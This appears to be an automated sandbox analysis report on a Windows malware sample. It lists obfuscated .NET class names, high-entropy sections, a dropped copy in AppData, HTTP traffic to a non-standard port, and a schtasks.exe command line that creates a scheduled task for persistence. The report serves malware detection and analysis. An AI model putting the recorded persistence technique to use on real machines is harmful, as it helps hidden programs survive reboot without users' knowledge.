Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4DBE1 push ebp; ret 0_2_05C4DBEE
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4DB40 push ebp; ret 0_2_05C4DB42
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4DB4F push ebp; ret 0_2_05C4DB51
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4DB0A push ebp; ret 0_2_05C4DB18
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4DAC2 push ebp; ret 0_2_05C4DAC3
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4DAE0 push ebp; ret 0_2_05C4DAE1
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4DA96 push ebp; ret 0_2_05C4DA9B
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_02595718 pushfd ; retn 0004h 11_2_02595732
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CCD450 push edx; iretd 11_2_04CCD462
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CCD463 push edx; iretd 11_2_04CCD467
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CCC538 push ds; iretd 11_2_04CCC546
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CCA263 push ds; iretd 11_2_04CCA26E
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CCD348 push eax; iretd 11_2_04CCD352
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CCA801 push ds; iretd 11_2_04CCA80E
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CCEBE0 push eax; iretd 11_2_04CCEBEE
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_04CCEB69 push eax; iretd 11_2_04CCEBEE
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 11_2_05D135E7 pushfd ; retf 0005h 11_2_05D13602
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Code function: 14_2_06ACEFE0 push es; ret 14_2_06ACEFF0
Source: l2rMtmFkD6.exe Static PE information: section name: .text entropy: 7.724539676194917
Source: ECcZgk.exe.0.dr Static PE information: section name: .text entropy: 7.724539676194917
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, HS3UGjS4dyhetetOko.cs High entropy of concatenated method names: 'SI8IkHDhQ9', 'hEtIUfuXrO', 'msQI6jhcjF', 'E0lI5ri1SJ', 'sCbIdSItMw', 'aIfI9w6W4d', 'sQUysgJkpObOC5kKkY', 'Y47niRP7AhfInIqnMh', 'fyj2FarlKaU3eOfXCo', 'MyMIIjfELw'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, GPKmg6PBNp1Go8FXJa.cs High entropy of concatenated method names: 'fBkuIqCjmy', 'IGZuy83tTH', 'WVNuSpWc97', 'ORvuliFpF5', 'veLuOgtNEx', 'yROuDSGQRW', 'lSSuoqLm6F', 'mxSWQT5Kon', 'qfcWayq7EO', 'vvFWsboYVt'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, x8Wai58sQjhcjF80lr.cs High entropy of concatenated method names: 'oBvEmQ7VHD', 'sIRETqcL75', 'RAqEfmQRZF', 'YWbE8DLE6m', 'OafEdIfug8', 'a03E9S9ib0', 'h4EErSyB93', 'AWdEWPNOpl', 'J7AEuvffsx', 'JEXEe5lE8q'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, Q1SJ81X2uYyCoeCbSI.cs High entropy of concatenated method names: 'M9eDGp42Ls', 'i2IDAw87gF', 'YsBEZo6Bc8', 'i1eEKtjrSd', 'pstEwviUAi', 'SwwE03XmrS', 'iZtEpQ4OLW', 'eu5ER6Qeop', 'nvPEFlNl5G', 'MyCEq0UK5R'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, NAOrPkEcVdZdY5vb0y.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kBL3sHrPsE', 'sIw3PPIuN6', 'G1P3zPc5AL', 'ROlyNv9uSF', 'aoXyIiWxBw', 'Xo8y3oDXNR', 'H4uyyCuWlC', 'Yw902A2Ys0I7eNB1Ijc'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, nd8rSeaGhR6IXfvpaP.cs High entropy of concatenated method names: 'nyoWlYoQTH', 'aWRWOxgEWJ', 'U4RWEy7Frq', 'TcXWDVRCpU', 'hYtWofVljy', 'EcRWk91sAx', 'GGEWUjQNre', 'QcnWvIxMHo', 'YpVW6gOg4G', 'fMEW5kU6bt'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, X9VLTpIIXQUUYtDcS68.cs High entropy of concatenated method names: 'ToString', 'SxIey9PZjb', 'zS7eSpPxAi', 'aRFecOo9SB', 'Ep5elwWQq9', 'NEreO4e3C1', 'H9YeEH8Og5', 'TdGeDU1gfn', 'U2mNnq7ptRLM2xl0Ixh', 'VLSfgI7MuZ2SFdidUd5'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, LKBf0PiCcs2cb4t0Wm.cs High entropy of concatenated method names: 'EVBgfAbpMP', 'K05g8iDhIx', 'wSogx3f0F6', 'vjIgYgRxZa', 'FNDgKkhUFG', 'y01gw0xEZG', 'Jf0gpCJ7b2', 'iefgRThglv', 'QrugqLZPrk', 'Snggt69Y9M'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, O2tGaT14GM0PR0bByI.cs High entropy of concatenated method names: 'qpNra4GwoK', 'yU7rPNaBIq', 'z7rWN52Nha', 'wvVWIFkxUx', 'RdartAXFEg', 'xkYrjEXP7N', 'iKnriwdWPy', 'ivZrV6AKHR', 'olPr4yAOS7', 'dknrCVxiwf'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, EHDhQ9fEEtfuXrOd2d.cs High entropy of concatenated method names: 'IcHOVCEBdT', 'A0AO4gdkmZ', 'ywlOChc6jA', 'mmUOnneJou', 'hk6OBNI1Tj', 'uukO1aMswm', 'H37OQPXQa4', 'wstOa4YZqe', 'oxXOs9LpEG', 'C0xOP4Uu0r'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, TQh3vTC7SUbllLjr5F.cs High entropy of concatenated method names: 'ToString', 'teL9tpU2tE', 'Ock9Yj2SXe', 'wq69ZyL2rc', 'Qlq9KAI2GO', 'fQJ9weRBvW', 'Mvu90qFn8Z', 'vMl9pMuj16', 'PyX9RpR7SH', 'HcN9FFkv36'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, vRVBQ5pi5wIpjLbJ0F.cs High entropy of concatenated method names: 'Mnekl7Wv4P', 'PUCkEftAbD', 'mNLkoaFujI', 'mRAoPOEMuR', 'vPuozp9CIY', 'Af8kN9aqrc', 'befkIvlOQE', 'FBGk3Sbxbr', 'rClkyKTC1M', 'tuAkS2F3il'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, NaWWy236mBYlIC15Ig.cs High entropy of concatenated method names: 'Of623GOAp', 'QNFmRDnSb', 'XvJTMQmvn', 'RW2ACKioS', 'TFq8D9xEJ', 'YtAX7Di3c', 'K893J6FotHkPB2Rkc8', 'uqncu2bTgD0pLyY0AJ', 'F95WfHSCc', 'TFTedlkxs'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, T4Pxs9nCsGaJbVXZLr.cs High entropy of concatenated method names: 'YXjr6nNnEt', 'PuEr5E0yrN', 'ToString', 'UUwrlkSdc3', 'H21rO3lk6r', 'oWwrEvcaOy', 'ILirDTTQ4y', 'zk0roOMMN7', 'i7RrkcIg29', 'YVcrU347Ve'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, bE2mGsIyHT2OX6boTqq.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GDoeVimwAm', 'BFje4LDAv5', 'x3NeCo898a', 'VEyen3v6ZP', 'POjeBxNrtW', 'OwCe1XMOyH', 'BKPeQOuDhT'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, qKJJQiKg8PHsV2A7Rh.cs High entropy of concatenated method names: 'JNRoM8lZWM', 'IQmoH7gls0', 'IY3o2y7r72', 'c2Rom1GU5k', 'fQ8oTbEMnw', 'f65oADXpj5', 'WGNo8Aumsc', 'uQPoXtBydn', 'VSnb83HgEnePP04fn9W', 'zNpTmHH4Y8hlZjl1FNy'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, CYJeEKV7oSpgndxICZ.cs High entropy of concatenated method names: 'LFVdqDJ5Rr', 'o9SdjThRPT', 'oKYdVDaN3F', 'nbad4uIgHk', 'X2CdYOTgZs', 'nxydZMlWoy', 'UJNdKJn6p4', 'VSNdwxof08', 'MDTd00v0fR', 'je9dpvSfdI'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, hYO4sGINkmwQXfuFmpw.cs High entropy of concatenated method names: 'GKjuHekkCE', 'lxpuh1bswT', 'Vfuu26DHhv', 'nWauml8Wdk', 'e6RuGwvO9e', 'RXauT1nWZJ', 'FiyuA9fkFo', 'I01ufx5saQ', 'su9u8y4mCj', 'UJ5uXFwNaw'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, OGIZdHO3vNmwVLxrLN.cs High entropy of concatenated method names: 'Dispose', 'bgGIs1cjHd', 'o503Y04JaK', 'hHL339roQy', 'IgdIP8rSeG', 'yR6IzIXfvp', 'ProcessDialogKey', 'WPf3NiHkjp', 'gXU3INhEBZ', 'zMT33YPKmg'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.cs High entropy of concatenated method names: 'NtlycWe0df', 'CQZylfPKui', 'Ee7yOvZtbM', 'KVgyEcA25Z', 'XbUyDIIoW0', 'qQAyok6MFf', 'txsykipOhs', 'zJryUJu9vO', 'XdbyvGWFUe', 'Aaqy6bXyDO'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, XhO8u6zZZyZGdGFXJ9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HkuugdY9sA', 'y4MudcruRi', 'w7xu9yimlh', 'mmWur7Xl5C', 'FsfuWSkEM4', 'fwsuu7aVME', 'U3eueuqc1b'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, OMwIIfxw6W4dmq9fUH.cs High entropy of concatenated method names: 'ObHocbldyW', 'CwPoOUAtqQ', 'ILloDTvekQ', 'wfcokGKI3F', 'I8ioUHPDJW', 'tamDBFnCHe', 'QosD1wRJV9', 'jFMDQa4cTQ', 'CedDaUCN7x', 'TXFDsKKi3S'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, kVEbfGFamCto0jMeSX.cs High entropy of concatenated method names: 'rIdkHGjDGC', 'pgZkheuVVF', 'CUjk2NKMdZ', 'mD8kmTRAi3', 'x2kkGVPceH', 'BaxkTdoiEt', 'B3jkAfIZdU', 'FPJkfcYfOC', 'Wmvk81jLEm', 'VcwkX6GI5I'
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, DiHkjpsEXUNhEBZ2MT.cs High entropy of concatenated method names: 'U4BWx0K6xd', 'KPkWY1ZZgn', 'mgCWZPiufu', 'iKTWKshajF', 'SxKWVXLMmq', 'XtRWwBgk7P', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, HS3UGjS4dyhetetOko.cs High entropy of concatenated method names: 'SI8IkHDhQ9', 'hEtIUfuXrO', 'msQI6jhcjF', 'E0lI5ri1SJ', 'sCbIdSItMw', 'aIfI9w6W4d', 'sQUysgJkpObOC5kKkY', 'Y47niRP7AhfInIqnMh', 'fyj2FarlKaU3eOfXCo', 'MyMIIjfELw'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, GPKmg6PBNp1Go8FXJa.cs High entropy of concatenated method names: 'fBkuIqCjmy', 'IGZuy83tTH', 'WVNuSpWc97', 'ORvuliFpF5', 'veLuOgtNEx', 'yROuDSGQRW', 'lSSuoqLm6F', 'mxSWQT5Kon', 'qfcWayq7EO', 'vvFWsboYVt'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, x8Wai58sQjhcjF80lr.cs High entropy of concatenated method names: 'oBvEmQ7VHD', 'sIRETqcL75', 'RAqEfmQRZF', 'YWbE8DLE6m', 'OafEdIfug8', 'a03E9S9ib0', 'h4EErSyB93', 'AWdEWPNOpl', 'J7AEuvffsx', 'JEXEe5lE8q'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, Q1SJ81X2uYyCoeCbSI.cs High entropy of concatenated method names: 'M9eDGp42Ls', 'i2IDAw87gF', 'YsBEZo6Bc8', 'i1eEKtjrSd', 'pstEwviUAi', 'SwwE03XmrS', 'iZtEpQ4OLW', 'eu5ER6Qeop', 'nvPEFlNl5G', 'MyCEq0UK5R'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, NAOrPkEcVdZdY5vb0y.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kBL3sHrPsE', 'sIw3PPIuN6', 'G1P3zPc5AL', 'ROlyNv9uSF', 'aoXyIiWxBw', 'Xo8y3oDXNR', 'H4uyyCuWlC', 'Yw902A2Ys0I7eNB1Ijc'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, nd8rSeaGhR6IXfvpaP.cs High entropy of concatenated method names: 'nyoWlYoQTH', 'aWRWOxgEWJ', 'U4RWEy7Frq', 'TcXWDVRCpU', 'hYtWofVljy', 'EcRWk91sAx', 'GGEWUjQNre', 'QcnWvIxMHo', 'YpVW6gOg4G', 'fMEW5kU6bt'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, X9VLTpIIXQUUYtDcS68.cs High entropy of concatenated method names: 'ToString', 'SxIey9PZjb', 'zS7eSpPxAi', 'aRFecOo9SB', 'Ep5elwWQq9', 'NEreO4e3C1', 'H9YeEH8Og5', 'TdGeDU1gfn', 'U2mNnq7ptRLM2xl0Ixh', 'VLSfgI7MuZ2SFdidUd5'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, LKBf0PiCcs2cb4t0Wm.cs High entropy of concatenated method names: 'EVBgfAbpMP', 'K05g8iDhIx', 'wSogx3f0F6', 'vjIgYgRxZa', 'FNDgKkhUFG', 'y01gw0xEZG', 'Jf0gpCJ7b2', 'iefgRThglv', 'QrugqLZPrk', 'Snggt69Y9M'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, O2tGaT14GM0PR0bByI.cs High entropy of concatenated method names: 'qpNra4GwoK', 'yU7rPNaBIq', 'z7rWN52Nha', 'wvVWIFkxUx', 'RdartAXFEg', 'xkYrjEXP7N', 'iKnriwdWPy', 'ivZrV6AKHR', 'olPr4yAOS7', 'dknrCVxiwf'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, EHDhQ9fEEtfuXrOd2d.cs High entropy of concatenated method names: 'IcHOVCEBdT', 'A0AO4gdkmZ', 'ywlOChc6jA', 'mmUOnneJou', 'hk6OBNI1Tj', 'uukO1aMswm', 'H37OQPXQa4', 'wstOa4YZqe', 'oxXOs9LpEG', 'C0xOP4Uu0r'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, TQh3vTC7SUbllLjr5F.cs High entropy of concatenated method names: 'ToString', 'teL9tpU2tE', 'Ock9Yj2SXe', 'wq69ZyL2rc', 'Qlq9KAI2GO', 'fQJ9weRBvW', 'Mvu90qFn8Z', 'vMl9pMuj16', 'PyX9RpR7SH', 'HcN9FFkv36'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, vRVBQ5pi5wIpjLbJ0F.cs High entropy of concatenated method names: 'Mnekl7Wv4P', 'PUCkEftAbD', 'mNLkoaFujI', 'mRAoPOEMuR', 'vPuozp9CIY', 'Af8kN9aqrc', 'befkIvlOQE', 'FBGk3Sbxbr', 'rClkyKTC1M', 'tuAkS2F3il'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, NaWWy236mBYlIC15Ig.cs High entropy of concatenated method names: 'Of623GOAp', 'QNFmRDnSb', 'XvJTMQmvn', 'RW2ACKioS', 'TFq8D9xEJ', 'YtAX7Di3c', 'K893J6FotHkPB2Rkc8', 'uqncu2bTgD0pLyY0AJ', 'F95WfHSCc', 'TFTedlkxs'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, T4Pxs9nCsGaJbVXZLr.cs High entropy of concatenated method names: 'YXjr6nNnEt', 'PuEr5E0yrN', 'ToString', 'UUwrlkSdc3', 'H21rO3lk6r', 'oWwrEvcaOy', 'ILirDTTQ4y', 'zk0roOMMN7', 'i7RrkcIg29', 'YVcrU347Ve'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, bE2mGsIyHT2OX6boTqq.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GDoeVimwAm', 'BFje4LDAv5', 'x3NeCo898a', 'VEyen3v6ZP', 'POjeBxNrtW', 'OwCe1XMOyH', 'BKPeQOuDhT'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, qKJJQiKg8PHsV2A7Rh.cs High entropy of concatenated method names: 'JNRoM8lZWM', 'IQmoH7gls0', 'IY3o2y7r72', 'c2Rom1GU5k', 'fQ8oTbEMnw', 'f65oADXpj5', 'WGNo8Aumsc', 'uQPoXtBydn', 'VSnb83HgEnePP04fn9W', 'zNpTmHH4Y8hlZjl1FNy'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, CYJeEKV7oSpgndxICZ.cs High entropy of concatenated method names: 'LFVdqDJ5Rr', 'o9SdjThRPT', 'oKYdVDaN3F', 'nbad4uIgHk', 'X2CdYOTgZs', 'nxydZMlWoy', 'UJNdKJn6p4', 'VSNdwxof08', 'MDTd00v0fR', 'je9dpvSfdI'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, hYO4sGINkmwQXfuFmpw.cs High entropy of concatenated method names: 'GKjuHekkCE', 'lxpuh1bswT', 'Vfuu26DHhv', 'nWauml8Wdk', 'e6RuGwvO9e', 'RXauT1nWZJ', 'FiyuA9fkFo', 'I01ufx5saQ', 'su9u8y4mCj', 'UJ5uXFwNaw'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, OGIZdHO3vNmwVLxrLN.cs High entropy of concatenated method names: 'Dispose', 'bgGIs1cjHd', 'o503Y04JaK', 'hHL339roQy', 'IgdIP8rSeG', 'yR6IzIXfvp', 'ProcessDialogKey', 'WPf3NiHkjp', 'gXU3INhEBZ', 'zMT33YPKmg'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.cs High entropy of concatenated method names: 'NtlycWe0df', 'CQZylfPKui', 'Ee7yOvZtbM', 'KVgyEcA25Z', 'XbUyDIIoW0', 'qQAyok6MFf', 'txsykipOhs', 'zJryUJu9vO', 'XdbyvGWFUe', 'Aaqy6bXyDO'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, XhO8u6zZZyZGdGFXJ9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HkuugdY9sA', 'y4MudcruRi', 'w7xu9yimlh', 'mmWur7Xl5C', 'FsfuWSkEM4', 'fwsuu7aVME', 'U3eueuqc1b'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, OMwIIfxw6W4dmq9fUH.cs High entropy of concatenated method names: 'ObHocbldyW', 'CwPoOUAtqQ', 'ILloDTvekQ', 'wfcokGKI3F', 'I8ioUHPDJW', 'tamDBFnCHe', 'QosD1wRJV9', 'jFMDQa4cTQ', 'CedDaUCN7x', 'TXFDsKKi3S'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, kVEbfGFamCto0jMeSX.cs High entropy of concatenated method names: 'rIdkHGjDGC', 'pgZkheuVVF', 'CUjk2NKMdZ', 'mD8kmTRAi3', 'x2kkGVPceH', 'BaxkTdoiEt', 'B3jkAfIZdU', 'FPJkfcYfOC', 'Wmvk81jLEm', 'VcwkX6GI5I'
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, DiHkjpsEXUNhEBZ2MT.cs High entropy of concatenated method names: 'U4BWx0K6xd', 'KPkWY1ZZgn', 'mgCWZPiufu', 'iKTWKshajF', 'SxKWVXLMmq', 'XtRWwBgk7P', 'Next', 'Next', 'Next', 'NextBytes'
Drops PE files
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File created: C:\Users\user\AppData\Roaming\ECcZgk.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 55615
Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49719
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
